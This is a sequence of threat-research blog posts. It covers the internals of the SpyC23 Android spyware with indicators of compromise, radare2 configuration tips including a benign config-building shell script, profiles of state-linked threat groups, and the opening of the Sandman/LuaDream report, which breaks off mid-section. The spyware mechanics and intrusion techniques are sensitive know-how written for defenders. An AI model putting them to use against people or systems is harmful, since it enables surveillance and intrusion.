This class is responsible for much of the app’s upload request handling, acting as an interface between the app and the C2 server. Brodie contains a method named isProbablyArabic, suggesting again that these apps are used against Arabic-speaking targets.

isProbablyArabic method from Brodie class

CallRecService

This service enables the spyware’s call recording feature. The class is imported from an external native library, libcallrecfix.so, and runs as a service. The library is based on at least two open-source Android call recording projects, neither of which is actively maintained. This was implemented in 2020 and has been a staple of SpyC23 iterations since. The library is a binary compiled for each of the app’s compatible architectures.

checkRaw

This audio upload service has many of the same status logging strings and media recording parameters seen in older versions of Arid Viper’s Android toolsets, including FrozenCell, reported by Lookout in 2017, and VAMP, which was also reported by Palo Alto in 2017.

RcNewService class from FrozenCell (left) and checkRaw class from 2023 APP-UPGRADE version of SpyC23 (right)

Some elements of this audio recording code are present in GitHub repositories described as a teardown of the Telegram Android app. While this is potentially an adaptation of open-source software, the similarities between the SpyC23 APKs are consistent, and the external versions do not have the same variables or logging messages.

Moller

This class is notable because it contains code that spans back to much earlier versions of Arid Viper’s Android spyware. We identified a 2017 GnatSpy sample from Trend Micro’s Arid Viper reporting that shares the same upload functionality through a subclass JsDirService.

Panda

This class loads methods from external libraries libRoams.so and lib-uoil.so. The code imports several functions related to manufacturer-specific implementations, including Huawei, Oppo, and Xiaomi.

The Panda class imports methods from the open-source Gotev Android Upload Service, which was also used by the older versions of SpyC23. Panda imports methods from the OKhttp library to craft HTTP requests. When the OnCreate method runs, it initializes the Gotev service, parses the C2 configuration values, and registers GarciaReceiver, a receiver that monitors for a connection state change which was also present in older versions.

onCreate method inside the Panda class

Like older versions of SpyC23, this class has logic to parse and decode the C2 server details from strings stored inside lib-uoil.so and related binaries. The strings are partially Base64-encoded, likely with an additional layer on top, from which the correct C2 server URIs are parsed. The previous technique of dropping the strings before and after the hyphen remains, and a further substitution step removes spaces and underscores, replacing them with hyphens.

C2 Infrastructure

The C2 servers used by these apps continue the longstanding Arid Viper domain naming scheme of a hyphenated hostname built from Western-sounding personal names. The primary C2 servers are:

  • luis-dubuque[.]in – C2 domain used by APP-UPGRADE Skipped Messenger APK
  • danny-cartwright[.]firm[.]in – C2 domain used by com.teleram.app APK
  • conner-margie[.]com – C2 domain used by com.alied.santafi

We have included additional network indicators associated with app features that are unique to the APKs analyzed, including Google Cloud project hostnames and Firebase messaging hostnames.

Conclusion

The discovery of these APKs demonstrates that Arid Viper continues to thrive in the mobile malware space. The dedication to anti-analysis and obfuscation suggests that the developers are aware of research analysis and have applied measures to deter it and remain under the radar. The presence of code from other Arid Viper Android spyware families in SpyC23 fortifies the connection between this group’s various iterations of tools. The resulting bloat from carrying over older versions of the spyware aids attribution in the complex mobile malware landscape that pervades the Middle East.

Arid Viper has historically targeted military personnel in the Middle East, as well as journalists and dissidents. The most recent versions of SpyC23 highlight the actor’s focus on Arabic speakers, which is an interesting development given the actor’s historical penchant for targeting Israeli military personnel with Android spyware.

Those who are at risk of being targeted by this group should avoid installing applications from outside of the Google Play Store. Everyone should remain wary when installing new apps from any source: does this app really need the permissions it requests? In the case of SpyC23 apps, there is a lengthy walkthrough with images guiding the user to accept an inordinate number of permissions.

SentinelLabs would like to thank the research team at Cisco Talos for their collaboration on this research.

Indicators of Compromise

SHA1 Hashes

  • 03448782d5b717b7ad1a13b1841119bc033f40dd – Teleram /lib/mips/librealm-jni.so
  • 12af178d20ec7e1294873304b0ea81b5fcfd6333 – Teleram /lib/armeabi-v7a/librealm-jni.so
  • 17ab647f3b7ccf15b82f51e19301e682f7e8c82a – APP-UPGRADE /armeabi-v7a/libRoams.so
  • 29814eacb12b53efcda496485765a30c3c2b589e – Santafi /lib/x86_64/libsonsod.so
  • 2f0895fa9e1a404da46f56ab13c131de1a0eac1e – APP-UPGRADE /x86/libRoams.so
  • 300fb7a0597519b99b6120d16666be9b29ee5508 – APP-UPGRADE /x86_64/libcallrecfix.so
  • 31ba9425007d17745bb6b44c85042dcbd15fe837 – Santafi /lib/x86_64/libcallrecfix.so
  • 46bfcb28cde424d0d11e5772c2683391b0f1491a – com.teleram.app.apk, a Telegram-themed APK
  • 4f58d69c53685365a4b6df70eca6fa203e6ba674 – APP-UPGRADE /x86_64/libRoams.so
  • 532876649c027ebaea56604fbcd7ce909a8aa4e3 – APP-UPGRADE /arm64-v8a/libcallrecfix.so
  • 5476d52ab6f982bb29ba2ace0074e77523f9f655 – APP-UPGRADE /x86/libcallrecfix.so
  • 55c9c7a53c9468d365743f155b2af7e189586822 – APP-UPGRADE /arm64-v8a/libRoams.so
  • 5a238ade0b402c3dbef7c82406649f27ae6b479a – Santafi /lib/x86/libcallrecfix.so
  • 600442488eb9536c821188dfad9d59e987ff7a56 – Santafi /lib/armeabi-v7a/libsonsod.so
  • 6f68e8645b4b88d7608310b7736749368398914a – Teleram /lib/x86/librealm-jni.so
  • 793177ffe60030fefbe6a17361b266980f151fa4 – Santafi /lib/arm64-v8a/libcallrecfix.so
  • 893dae5ded7eb0a35e84867e62cbbb7e831aac97 – Santafi /lib/arm64-v8a/libdalia.so
  • 9c1c02a387b0aa59b09962f18e4873699d732019 – Santafi /lib/armeabi-v7a/libcallrecfix.so
  • 9d9696bc552dc5dbb4d925d0fb04f77018deef50 – Teleram /lib/x86_64/librealm-jni.so
  • a610a05d6087bc1493e505fd4c1e4ef4b29697e3 – com.alied.santafi.apk, a Telegram-themed APK
  • a8937d38cc8edb9b2dfb1e6e1c5cad6f63ae0ecc – APP-UPGRADE /x86/libuoil.so
  • a8e0b6fda4bc1bd93d2a0bc30e18c65eb7f07dec – Teleram /lib/arm64-v8a/libcallrecfix.so
  • aacb4e5f9e6b516b52d0008f2e5f58c60b46610b – Teleram /lib/armeabi-v7a/libcallrecfix.so
  • ae8d4853377f4a553ecad0c84398ef9dc8735072 – Teleram /lib/x86/libcallrecfix.so
  • b9835174a9a4445dc4d5ff572a79c54f234120bf – Santafi /lib/armeabi-v7a/libdalia.so
  • c0f4592df97073fb5021e2acee0a3763b8fbaf76 – Teleram /lib/x86_64/libcallrecfix.so
  • c1c5a00b22e7d12e8a41d5d8fbe625ecb218fa7c – Santafi /lib/arm64-v8a/libsonsod.so
  • c396327a2332bd6fbc771a97b5e0d4d1a43e8f72 – APP-UPGRADE themed Skip Messenger APK
  • ce954dcc62f17f6e31bfa9164f5976740f1b127e – APP-UPGRADE /arm64-v8a/libuoil.so
  • cfa5ef1bff2746407f96ab5c86b66ec5cf305e77 – Santafi /lib/x86_64/libdalia.so
  • da690c4b1569e1f0b0734762c0f274e3ba33ded1 – APP-UPGRADE /armeabi-v7a/libuoil.so
  • de92fb9af9d6e68a001b6263b9c3158325d77f99 – Teleram /lib/arm64-v8a/librealm-jni.so
  • e05ce0496c6d20c24997c17a65c44ccd08cb2a10 – APP-UPGRADE /armeabi-v7a/libcallrecfix.so
  • eb14e05364e675fcf03934be549ae96b36b12af0 – Santafi /lib/x86/libdalia.so
  • f8adf63d34eb54121389b9847771d110978aec8e – APP-UPGRADE /x86_64/libuoil.so
  • fb7b9681567478a660413ec591fc802e35a55b7e – Santafi /lib/x86/libsonsod.so

Domains

  • 1058215140016-kv5c01acm9r7argbis96lmudg6p68koe.apps.googleusercontent.com – Google Cloud content hostname used by APP-UPGRADE Skipped Messenger APK
  • 1095841779797-idgdkor5mh0lbjeq5spcksbj7jpdlaj9.apps.googleusercontent.com – Google Cloud web client hostname used by com.alied.santafi
  • 314359296475-glearr20do927s2v75cgiocb585gqjgd.apps.googleusercontent.com – Google Cloud web client hostname used by Teleram app
  • conner-margie[.]com – C2 domain used by com.alied.santafi
  • danny-cartwright[.]firm[.]in – C2 domain used by com.teleram.app APK
  • jolia-16e7b.appspot.com – Google Storage bucket used by com.alied.santafi
  • luis-dubuque[.]in – C2 domain used by APP-UPGRADE Skipped Messenger APK
  • rashonal.appspot.com – Google Cloud web client hostname used by APP-UPGRADE Skipped Messenger APK
  • skippedtestinapp.firebaseio.com – Firebase service for Skipped Messenger APKs
  • yellwo-473d0.appspot.com – Google Storage bucket used by Teleram app

11 Ways to Tweak radare2 for Faster and Easier macOS Malware Analysis

31 October 2023 at 15:08

Our recent eBook on how to use radare2 (r2) for macOS malware analysis focused on providing analysts with a series of guided use cases for typical tasks like string decryption, anti-evasion and automation. Aimed at those seeking to power-up their macOS malware analysis skills, the guide contains lots of tips on using r2, but mostly focuses on working through malware samples exemplifying typical challenges.

In this post, somewhat inspired by a similar post on Ghidra, we look at lowering the learning curve and supercharging productivity for those new to or recently converted to using the r2 platform. While the default settings in r2 may be fine for basic reverse engineering, there is a lot of simple customization we can and should do for a better malware analysis workflow.

Explore and Change the Default Theme

Environment is everything when you need to concentrate and focus, and nothing contributes to this more than the UI appearance and theme. Fortunately, r2 comes packed with a bunch of themes built in which can also be customized, so you don’t need to worry about downloading or installing third-party plugins or code.

First, we’ll see how to explore the available themes, then we’ll see how to set that as the default theme for every launch.

On the r2 command line, type eco , then a space, then tab. You’ll see a list of the built-in theme names.

r2 themes

Explore how the different themes look by typing the name of the theme after eco , hitting return, then executing pdf, x, or V to see how it looks. Rinse and repeat till you find one that you like the look of.

eco monokai; pdf; x
r2's monokai theme

Once you have your chosen theme, the next step is to make it the default theme. Exit r2 or open a separate Terminal window and use the following command line to create or append the config file at the default location ~/.radare2rc. I used ‘smyck’ here, but change to suit your preference.

cd; echo eco smyck >> .radare2rc

After executing the command, quit and restart r2 to see the change. The prompt can be customized within the chosen theme. Play around with different foreground / background color combinations with variations of:

ec prompt white green
ec prompt cyan darkgray

Turn Off the Jokes!

You may or may not enjoy the “fortune cookies” that appear on each launch of radare2. Some can be funny, others less so, depending on your taste. Be wary that if you’re sharing screenshots of your r2 sessions either publicly or privately, the ‘jokes’ may cause offense to others if you inadvertently capture them.

We can turn them off with a simple command added to our config file.

cd; echo e cfg.fortunes=false >> .radare2rc

Turn On (and Off) the Comments!

r2 comes with some built-in help for new reverse engineers or even experienced reversers who are learning a new architecture.

Compare the default display of the pdf command:

r2 comments

You will likely not want comments on all the time, as they can be distracting, but it can be really useful to turn them on when you come across an unfamiliar instruction or operand.

We can add a couple of aliases to our config file that will allow us to use the commands “$conn” and “$coff” to quickly toggle comments. Add the following commands to the .radare2rc file, and restart r2.

$coff='e asm.describe = false'
$conn='e asm.describe = true'

Indent Code Blocks for Better Visibility

radare2 helps reverse engineers visualize control flow in a variety of ways, one of which is by allowing the indentation of blocks in the disassembly to show nested code.

By default, this is turned off and all blocks appear at the same tabular offset, as in the example below.

Block indentation off

We can make it easier to quickly visualize the relationship between blocks of code by turning code indent on.

Indentation on

You could make a pair of aliases to toggle this setting as we did with comments, substituting the value ‘true’ with ‘false’, but for my part I never see a need to turn it off, so I just add the following to my config file.

cd; echo e asm.indent=true >> .radare2rc

Make r2’s Help More Helpful

Help in r2 is summoned with the ? command, but it can be tough finding what we need sometimes. It would make life easier if we could easily grep all the help for a search term of interest.

To do so, add the following code to the .radare2rc config file:

(help x; ?*~$0)

Now, restart r2 and load a binary, say /bin/ls for simplicity. Now compare the output of searching for help on the keyword ‘crypto’:

A macro to make searching the help doc easier

Our macro is just a shortcut for ? followed by a wildcard and then grepping for our search term, but it’s a lot easier to remember .(help <searchterm>).

Note that for multi-word search terms, you must escape any spaces in the search string.

.(help hexdump\ columns)
Spaces in the search term need to be escaped

Set the Block Size

Block size is the number of lines r2 prints out with commands like px. By default it’s set to 0x100, but sometimes that’s not enough to see everything of interest.

The block size can be changed within a session on the command line with b <size>, e.g.

b 0x200
Use the previous macro to get more help about block sizes

A simple alias in our config file is useful for printing out extended block size in one shot:

$x='b 0x200; px'

Sort and Search Functions By Size, XREFS & Other Criteria

In radare2, afl and afll are the go-to commands for viewing function information, but we sometimes want to tailor the output for specific items of interest. Here are a few different ones I use to help me narrow down various bits of code that might be of interest.

The first two have a dependency on another alias, $fcol, which simply prints out the column headings for the subsequent output from afll:

$fcol='afll\~:0'

Top twenty largest functions in the binary:

$top20='clear; $fcol; afll \| sort -k 3 -nr \| head -n 20'

Top twenty functions with the largest number of XREFS:

$topX='clear; $fcol; afll \| sort -k 14 -nr \| head -n 20'

Functions related to swizzling in Objective-C binaries (shout out to LaurieWired’s recent talk for this idea):

$swiz='afl\~exchangeImplement; afl\~getInstanceMethod; afl\~getClassMethod; afl\~setImplementation'

Print out the functions of interest in a Go binary, ignoring the boilerplate imports:

(gafl; afl | grep -v vendor_golang.org | grep -v runtime | grep -e main -e github | sort -k 4 -nr) 

This time we used a macro rather than an alias. Either will work. Note that with the macro, you don’t need to escape special characters like the pipe or tilde symbols.

Print Calls to and From the Current Function

Understanding the relationships between functions is crucial to discovering malicious behaviour and honing in on parts of a binary we want to use for hunting and detection.

To view all the calls to a current function, the r2 command axg will give a nice graphical view all the way back to main. To view the calls a function makes, use pifc.

If we find these obtuse r2 commands difficult to remember, then of course aliases are our friends:

$callee='axg'
$calls='pifc'

However, exploring the nuances of ax and pi through ? and our .(help) macro will return dividends.

We can gain a better understanding of the overall structure of a function with the following macro, which prints out a useful summary of information.

(metaf ;  afiq; echo XREFS:; axg; echo INSTR:; afist; pds)

Edit and Test Yara Rules Within radare2

If you have a local YARA file, you can edit it from within r2 from the command line like so:

!vi <path to yara file>

From here, add or adjust existing rules, save and quit out of the text editor, then call it on the currently loaded binary to test the file against the rules:

!yara -fs <path to yara file> `o.`

The r2 command o. serves as a reference to the currently loaded binary and is useful in a wide variety of aliases and macros.

Let’s define an alias and a macro for the above.

$rules=!vi <path to your yara rules file>
(yara x;  !yara -$0w <path to your yara rules> `o.`)

After restarting r2, we can now edit our YARA rules from within r2 with the $rules command. We can call our rules on the currently loaded file with .(yara f).

Try .(yara m) and .(yara s) and note the differences.

Running YARA rules against the loaded sample

Query VirusTotal about the Current Sample

Once you realize how easy it is to call external command line utilities from within an r2 session, multiple possibilities for faster and easier workflows open up.

Perhaps one of the most oft-used tools for malware analysts is VirusTotal. If you have the VT API tool installed and in your PATH, it’s very easy to integrate this with r2. Again, a simple addition to our config file is all that’s needed:

$vt=!vt file `o.` --include=meaningful_name,tags,popular_threat_classification,first_submission_date,last_submission_date

You can modify what to include to suit your preferences per the VT documentation.

Get results from VirusTotal within r2 session

Check Code Signature of Current Sample

One final tip for anyone who struggles to remember all the various ways to check whether a sample has a valid code signature, whether it’s notarized and whether it’s been revoked by Apple…put it all in an alias and run it from within r2!

$codesign='izz~Developer ID; !codesign -dvvv -r - `o.`; !spctl -vvvv -a -t execute `o.`'
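The post builds up the config file one `echo ... >> .radare2rc` at a time. As an added example (not code from the original post or from the radare2 project), the shell functions below collect every setting, alias and macro from the sections above into one installer that only appends a line when it is not already present, so re-running it after an edit does not leave duplicate aliases behind. It assumes the rc file path `~/.radare2rc` used in the post; the YARA rules path `/path/to/rules.yar` is a placeholder for your own file, which the post leaves to the reader.

```shell
#!/bin/sh
# Added example, not code from the original post: assemble the radare2
# tweaks described above into an rc file idempotently.
#
# Appending with "echo ... >> .radare2rc" works, but re-running the commands
# duplicates lines, and aliases that contain single quotes, backslash
# escapes or `o.` backticks need careful shell quoting. Feeding the lines
# through a quoted heredoc and appending only when the exact line is absent
# avoids both problems.

# r2rc_add FILE LINE: append LINE to FILE unless an identical line exists.
r2rc_add() {
    rc_file=$1
    line=$2
    [ -f "$rc_file" ] || : > "$rc_file"
    if grep -qxF -- "$line" "$rc_file"; then
        return 0                          # already present, nothing to do
    fi
    printf '%s\n' "$line" >> "$rc_file"   # %s keeps backslashes intact
}

# r2rc_install FILE [YARA_RULES]: write every setting, alias and macro from
# the post into FILE. YARA_RULES is the path of your rules file; the default
# is a placeholder, not a path from the post.
r2rc_install() {
    rc_file=$1
    yara_rules=${2:-/path/to/rules.yar}
    # Quoted delimiter: nothing inside the heredoc is expanded by the shell,
    # so $aliases, \| escapes and `o.` reach r2 exactly as written.
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        r2rc_add "$rc_file" "$line"
    done <<'EOF'
eco smyck
e cfg.fortunes=false
e asm.indent=true
$coff='e asm.describe = false'
$conn='e asm.describe = true'
(help x; ?*~$0)
$x='b 0x200; px'
$fcol='afll\~:0'
$top20='clear; $fcol; afll \| sort -k 3 -nr \| head -n 20'
$topX='clear; $fcol; afll \| sort -k 14 -nr \| head -n 20'
$swiz='afl\~exchangeImplement; afl\~getInstanceMethod; afl\~getClassMethod; afl\~setImplementation'
(gafl; afl | grep -v vendor_golang.org | grep -v runtime | grep -e main -e github | sort -k 4 -nr)
$callee='axg'
$calls='pifc'
(metaf ;  afiq; echo XREFS:; axg; echo INSTR:; afist; pds)
$vt=!vt file `o.` --include=meaningful_name,tags,popular_threat_classification,first_submission_date,last_submission_date
$codesign='izz~Developer ID; !codesign -dvvv -r - `o.`; !spctl -vvvv -a -t execute `o.`'
EOF
    # The two YARA entries take the rules path, so they are built outside
    # the literal heredoc; \$ and \` keep r2's own $0 and `o.` intact.
    r2rc_add "$rc_file" "\$rules=!vi $yara_rules"
    r2rc_add "$rc_file" "(yara x;  !yara -\$0w $yara_rules \`o.\`)"
}

# r2rc_count FILE: number of non-empty lines, handy for confirming that a
# second install run changed nothing.
r2rc_count() {
    grep -c . "$1"
}

# Usage: . ./r2rc.sh && r2rc_install ~/.radare2rc ~/rules.yar
```

Running `r2rc_install` a second time is a no-op, which is the property the plain `echo >>` approach lacks; the quoted heredoc is also why the `\|` and `\~` escapes the post uses inside aliases survive without a second layer of backslashes.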

Conclusion

Working with r2 can be daunting at first, but the platform is built on simplicity. Thanks to its integration with the command line, with a few customizations, radare2 can be quickly turned into a powerful platform for malware analysts. There are also many plugins for radare2 to augment it with various external decompilers, including Ghidra, work with frameworks like Frida, and (of course) work with AI chat bots.

If you enjoyed this post and haven’t yet checked out the ebook, A Security Practitioner’s Guide to Reversing macOS Malware with Radare2, you can find it here. This free PDF resource covers lots of recent macOS malware and walks through example cases of common reversing tasks, all in radare2.

The Israel-Hamas War | Cyber Domain State-Sponsored Activity of Interest

By: Tom Hegel
24 October 2023 at 12:54

By Tom Hegel and Aleksandar Milenkoski 

Since the start of the Israel-Hamas war, the cyber domain has played a critical role in the conflict, albeit in ways the world may not have expected. Immediately following the attacks from Hamas on October 7th, social media became a hotbed of disinformation, inaccurate self-described OSINT investigators, and public confusion. Unfortunately, leading social media platforms continue to fail at stopping the spread of disinformation regarding this war. We will continue to see it abused as a go-to method to sway public perception of events with no signs of it ending soon.

However, outside of social media information abuse and opportunistic hacktivism, we must not forget the likelihood of targeted attacks originating from specific, state-sponsored threat actors. Understanding and closely monitoring all aspects of the quickly evolving conflict within the digital domain is critical, as such targeted attacks will translate into real-world consequences. While we continue to collaborate privately with partners, we also seek to bolster the wider industry knowledge about where to place our efforts.

This is an updated compendium of actors for cybersecurity researchers, analysts, and network defenders to watch closely. These actors have potential for significant involvement as the war continues, including APTs across Hamas, Hezbollah, and Iran-based clusters of activity. While state-sponsored APTs should remain a strong focus, we must also carefully monitor the increasingly common use of hacktivist personas used to cloak state-sponsored operations.

In this post, we share recommended and publicly accessible information in an effort to streamline the community’s understanding of relevant actors across historical reports for reference. In addition, we are sharing our perspective on public actor naming overlaps. Please note that each source of public reporting may perform attribution and actor clustering uniquely from its own perspective. Nonetheless, these sources should serve as starting points for readers looking to catch up on relevant open-source intelligence for their own defense posturing and analysis needs.

Hamas-Aligned Clusters

Arid Viper

Aliases:

  • APT-C-23
  • Grey Karkadann
  • Desert Falcon
  • Mantis

Description:

Arid Viper is a threat group conducting cyber espionage and information theft operations since at least 2017, predominantly against targets in the Middle East. Based primarily on the geopolitical context of its activities, Arid Viper is suspected to operate on behalf of Hamas with further conclusive information needed to solidify this assessment. For example, the Israeli Defence Forces (IDF) have reported on a campaign targeting soldiers stationed near the Gaza border, which is suspected to be orchestrated by Hamas. This campaign has been separately attributed with medium confidence to Arid Viper based on victimology and similarities with previous activities attributed to this actor such as overlaps in initial infection techniques.

Targeting individuals is a common practice of Arid Viper. This includes pre-selected Palestinian and Israeli high-profile targets as well as broader groups, typically from critical sectors such as defense and government organizations, law enforcement, and political parties or movements. Common initial infection vectors include social engineering and phishing attacks using themed lure documents. The latter often involves establishing rapport with targets over social media, such as Facebook and Instagram, with catfishing being a frequently used technique.

Arid Viper uses a variety of malware as part of its operations, including stagers, backdoors, and mobile spyware applications for the iOS and Android platforms. Arid Viper’s malware is actively maintained and upgraded to meet the group’s operational requirements. This threat actor has consistently demonstrated innovation by adopting new malware development practices across a range of programming and scripting languages, such as Delphi, Go, Python, and C++.

Gaza Cybergang

Aliases:

  • Molerats
  • TA402
  • Gaza Hackers Team
  • Moonlight
  • Extreme Jackal
  • Aluminum Saratoga
  • JEA/Jerusalem Electronic Army (Low to Medium Confidence)

Description:

Gaza Cybergang is a threat actor that has been active since at least 2012. The group primarily targets entities throughout the Middle East, including Israel and Palestine, with less frequently observed activity in the EU and US. Targeted entities include government, defense, energy, financial, media, technology, telecommunication, and civil society. Our current assessment of Gaza Cybergang indicates a medium to high level of confidence in Hamas affiliation.

The group has historically used a variety of custom and publicly available tools in their attacks, showing a notable preference for spear phishing as a method of initial access. They have been known to use malicious documents and email attachments to deliver malware and link lures, and they often deploy implants to maintain persistence on compromised systems. Tools include Molerat Loader, XtremeRAT, SharpStage, DropBook, Spark, Pierogi, PoisonIvy, and many others observed uniquely over the years.

The overall objectives of Gaza Cybergang appear to be primarily intelligence collection and espionage. They seek to gather intelligence, monitor political developments in the region, and support their cause through cyber activities. The group has been active for many years, and their persistence and adaptability in the face of evolving tensions make it a notable actor in the cyber threat landscape moving forward.

Hezbollah-Aligned Clusters

Plaid Rain

Aliases:

  • Aqua Dev 1
  • Polonium

Description:

Plaid Rain is a threat actor first documented in 2022 with a primary focus on targeting entities in Israel across a broad range of verticals, including defense, government, manufacturing, and financial organizations. Plaid Rain is considered to be based in Lebanon; however, its activities indicate potential coordination with Iran-nexus actors affiliated with Iran’s Ministry of Intelligence and Security (MOIS). Some indicators supporting this assessment include observed overlaps in targeting and TTPs. The potential collaboration between MOIS and Plaid Rain positions this threat group in the nexus of actors that serve as proxies, providing plausible deniability to the government of Iran, such as Cobalt Sapling.

For initial infection, Plaid Rain is suspected to rely primarily on vulnerability exploitation, downstream compromises, and stolen credentials. The group’s arsenal consists of a wide range of well-maintained custom tooling exemplified by the Creepy malware toolset. Plaid Rain’s malware supports a broad range of complementary functionalities following the latest trends in the malware landscape. For example, the CreepyDrive malware uses cloud services for command and control purposes, likely in an attempt to evade detection by making malicious traffic look legitimate.

Lebanese Cedar

Aliases:

  • Volatile Cedar
  • DeftTorero

Description:

Lebanese Cedar is a lesser-reported APT with a history of successful intrusions across Lebanon, Israel, Palestine, Egypt, the United States, the United Kingdom, and more. The group was first observed in 2015 and has since received limited security industry attention. Similar to Plaid Rain, we attribute Lebanese Cedar to the Lebanese Shiite militant group Hezbollah, with potential coordination with Iran-nexus actors affiliated with the Ministry of Intelligence and Security (MOIS).

The best-observed initial access methods have centered around the compromise of victim web servers via n-day vulnerabilities for the deployment of webshells, including ASPXSpy, devilzshell, and Caterpillar. Further use of Meterpreter and their custom Explosive RAT has been associated with objectives around maintaining access through theft of legitimate network credentials, ultimately pursuing espionage objectives.

Relevant Iranian Clusters

Iran hosts a diverse array of state-sponsored threat actors whose activities quickly expand past the specific focus on the Israel-Hamas war. These threat actors exhibit variability in terms of size, capability, and motivation, and they have been responsible for a wide spectrum of cyber operations. While some have clear affiliations with the Iranian government, many Iranian hacktivist personas claim to operate independently. It is crucial to acknowledge that emerging hacktivist collectives may serve as a means to obscure state sponsorship, influencing public opinion and concealing attribution of offensive actions. We strongly recommend that media outlets and industry colleagues exercise caution when publicly disseminating content produced by hacktivist collectives. The propagation of their claims, viewpoints, and actions aligns with an overarching mission, and endorsing these activities contributes to their success.

Nonetheless, the diversity and adaptability of Iranian cyber threat actors make them a significant and multifaceted component of the global threat landscape moving forward. As we monitor the evolving situation in the Middle East, it is imperative to focus on Iran as a potential origin of both direct cyber offensive actions and proxy operations supported by Iran-linked groups like Hamas and Hezbollah.

ShroudedSnooper

Aliases:

  • Storm-0861
  • Scarred Manticore

Description:

ShroudedSnooper has been part of multiple recent intrusions across the Middle East, including Israel within the past two months, and elsewhere since at least 2020. The most recent observations and activity we can confirm center around intrusions across the telecommunication and government sectors. The group is attributed to Iran’s Ministry of Intelligence and Security (MOIS).

Our current understanding of the group is that they operate for intelligence collection and initial access to other MOIS entities. Initial access methods for ShroudedSnooper have, and potentially continue to be, accomplished through the compromise of publicly accessible web servers via n-day vulnerabilities. As observed in the recent Israeli telecom intrusions, the group has then made use of backdoors mimicking enterprise security software.

Cobalt Sapling

Aliases:

  • Moses Staff
  • Abraham’s Ax
  • Marigold Sandstorm

Description:

‘Moses Staff’ and ‘Abraham’s Ax’ are hacktivist personas known for their anti-Israel rhetoric, disruptive and data exfiltration attacks, and penchant for leaking stolen data online along with propaganda content in the form of videos or imagery. Moses Staff and Abraham’s Ax are potentially distinct groups. Since the emergence of Moses Staff in 2021 and Abraham’s Ax in 2022 proclaiming allegiance with Hezbollah, the groups have continued to separately maintain their online presence. However, they share iconography, content editing and infrastructure management practices. This, and the alignment of their activities with the geopolitical interests of Iran, suggests that the two groups are likely part of a single cluster (also referred to as Cobalt Sapling) and serve as proxy groups providing plausible deniability to Iran.

Moses Staff has traditionally focused its efforts on business and government organizations primarily within Israel. In contrast, Abraham’s Ax has asserted responsibility for attacks on entities located outside of Israel but with geopolitical relevance to the country. For example, the alleged intrusions into Saudi Arabian government entities by Abraham’s Ax may have been an attempt to counter the normalization of relations between Israel and Saudi Arabia previously conditioned by resolving the Israeli-Palestinian issue.

Although the threat intelligence research community has identified custom offensive tooling observed in Moses Staff attacks, such as StrifeWater, PyDCrypt and DCSrv, we do not exclude the possibility of Moses Staff and Abraham’s Ax sharing tooling and operational practices, which makes accurate clustering challenging at this time. Operations attributed to Moses Staff have involved RATs and ransomware with no indications of financial motivation, but rather disruption, destruction, and concealment of cyber espionage activities.

APPENDIX: Recommended Public Reporting

Arid Viper

Gaza Cybergang

Plaid Rain

Lebanese Cedar

ShroudedSnooper

Cobalt Sapling

Sandman APT | A Mystery Group Targeting Telcos with a LuaJIT Toolkit

21 September 2023 at 19:50

By Aleksandar Milenkoski, in collaboration with QGroup

Executive Summary

  • SentinelLabs has observed a new threat activity cluster by an unknown threat actor we have dubbed Sandman.
  • Sandman has been primarily targeting telecommunication providers in the Middle East, Western Europe, and the South Asian subcontinent.
  • The activities are characterized by strategic lateral movements and minimal engagements, likely to minimize the risk of detection.
  • Sandman has deployed a novel modular backdoor utilizing the LuaJIT platform, a relatively rare occurrence in the threat landscape. We refer to this malware as LuaDream.
  • The implementation of LuaDream indicates a well-executed, maintained, and actively developed project of a considerable scale.
  • At this time, we don’t have a consistent sense of attribution. LuaDream does not appear to be related to any known threat actors. While the development style is historically associated with a specific type of advanced threat actor, inconsistencies between the high-end development of the malware and poor segmentation practices lead us towards the possibility of a private contractor or mercenary group similar to Metador.

Overview

In collaboration with QGroup GmbH, SentinelLabs observed over August 2023 a threat activity cluster targeting the telecommunication sector. The activities have been conducted by a threat actor of unknown origin using a novel modular backdoor based on the LuaJIT platform. We dub this threat actor and the backdoor Sandman and LuaDream in reference to what we suspect to be the backdoor’s internal name – DreamLand client.

The activities we observed are characterized by strategic lateral movement to specific targeted workstations and minimal engagement, suggesting a deliberate approach aimed at achieving the set objectives while minimizing the risk of detection.

The implementation and architecture of LuaDream suggest a maintained, versioned project under active development. This is a modular, multi-protocol backdoor whose main functionalities are:

  • exfiltrating system and user information, paving the way for further precision attacks;
  • managing attacker-provided plugins that extend LuaDream’s features.

Although the intrusions were detected and interrupted before the threat actor could deploy plugins, our analysis of LuaDream staging samples shared on VirusTotal provided a glimpse into what functionalities the plugins may implement, with command execution capabilities being one example.

The 36 distinct LuaDream components we identified and the support for multiple protocols for C2 communication indicate a project of a considerable scale. The LuaDream staging chain is designed to evade detection and thwart analysis while deploying the malware directly into memory. LuaDream’s implementation and staging process leverage the LuaJIT platform, the just-in-time compiler for the Lua scripting language. This is primarily to make malicious Lua script code difficult to detect.

A Penchant for Telcos

Based on current visibility, accurate clustering remains a challenge. The focused, strategy-driven activities and the use of complex malware designed to evade detection point to a motivated and capable adversary. The TTPs, victimology, and the characteristics of the deployed malware indicate that it is highly likely this activity has espionage motivations. Communication providers are frequent targets of espionage activity due to the sensitive data they hold.

The activity cluster we observed and examination of C2 netflow data indicate a pronounced focus on targeting telecommunications providers with a broad geographical distribution, including the Middle East, Western Europe, and the South Asian subcontinent.

Geographical distribution of victims

Compilation timestamps and a string artifact found within LuaDream hint at potential malware development efforts over the first half of 2022, suggesting possible threat actor activity dating back to 2022.

While we cannot associate LuaDream with any known threat actor, we lean towards the possibility of a private contractor or mercenary group. LuaJIT is typically used as scripting middleware in gaming and in specialty embedded applications and appliances; its use in APT malware is relatively rare, but the population of actors using it is becoming broader.

Embedded Lua VMs serve as a mechanism for modularity and extensibility for advanced APTs, historically considered Western or Western-aligned. However, this development paradigm is being embraced by a broader set of threat actors that also target Western countries and deserves further scrutiny, as exemplified by the Sandman APT. Our talk at LABScon 2023 described this development paradigm over time, bookended by our discovery of Sandman APT as the latest example and Fast16 as the earliest, dating back to 2005.

In March 2023, Kaspersky briefly described, in a quarterly roundup, new malware actively targeting a government entity in Pakistan. Based on the sparsely described characteristics, we assess that they are referring to a variant of LuaDream, dubbed DreamLand. Note the following string in the LuaDream samples we identified:

C:\\project\\tenyears\\DreamLandClient\\Project\\cpp\\HttpClientLj\\testdll.dll

Threat Actor Activities

The activities we observed took place over several weeks in August 2023. After stealing administrative credentials and conducting reconnaissance, Sandman infiltrated specifically targeted workstations using the pass-the-hash technique over the NTLM authentication protocol. On one of the targets, all of the workstations were assigned to personnel in managerial positions.

